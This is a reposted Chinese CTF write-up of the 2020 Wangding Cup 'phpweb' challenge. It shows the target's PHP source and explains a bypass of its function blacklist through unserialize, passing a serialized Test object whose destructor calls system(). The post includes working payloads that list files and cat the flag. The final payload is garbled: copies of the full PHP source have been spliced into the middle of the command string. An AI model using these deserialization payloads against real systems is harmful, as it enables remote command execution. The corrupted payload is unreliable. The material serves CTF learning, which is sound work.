曂沅仴駦 发表于 2024-11-1 18:51:17

[网鼎杯 2020 朱雀组]phpweb

打开靶机,抓包分析,获得连个关键参数func和p,根据初始页面提示了解连个参数大概是功能和功能参数
https://img2024.cnblogs.com/blog/3518346/202411/3518346-20241101161031271-786748121.png
测试func=system&p=ls提示hacker..说明有检测过滤
https://img2024.cnblogs.com/blog/3518346/202411/3518346-20241101161418549-2042015788.png
那么我们先读取源码看看func=readfile&p=index.php
点击检察代码 <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk","array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
            return $result;
      } else {return "";}
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
      }else {
            die("Hacker...");
      }
    }
    ?>发现一系列禁用函数和一个类的定义,类的定义里有魔术方法__destruct(析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行),这里理所应当想到利用func=unserialize且发现unserialize没有被禁用,利用链就是利用func反序列函数调用魔术方法里的func调用,从而达到过滤的绕过 <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk","array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
            return $result;
      } else {return "";}
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
      }else {
            die("Hacker...");
      }
    }
    ?>func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
https://img2024.cnblogs.com/blog/3518346/202411/3518346-20241101164321549-1623706102.png
https://img2024.cnblogs.com/blog/3518346/202411/3518346-20241101164113092-608876536.png
发现可行后寻找flag
https://img2024.cnblogs.com/blog/3518346/202411/3518346-20241101165211720-1849572503.png
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk","array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
            return $result;
      } else {return "";}
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
      }else {
            die("Hacker...");
      }
    }
    ?>$(find <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk","array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
            return $result;
      } else {return "";}
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
      }else {
            die("Hacker...");
      }
    }
    ?>/ <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk","array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
            return $result;
      } else {return "";}
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
      }else {
            die("Hacker...");
      }
    }
    ?>-name <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk","array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
            return $result;
      } else {return "";}
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
      }else {
            die("Hacker...");
      }
    }
    ?>flag*)";s:4:"func";s:6:"system";}
得到flag
https://img2024.cnblogs.com/blog/3518346/202411/3518346-20241101165314352-1687459473.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: [网鼎杯 2020 朱雀组]phpweb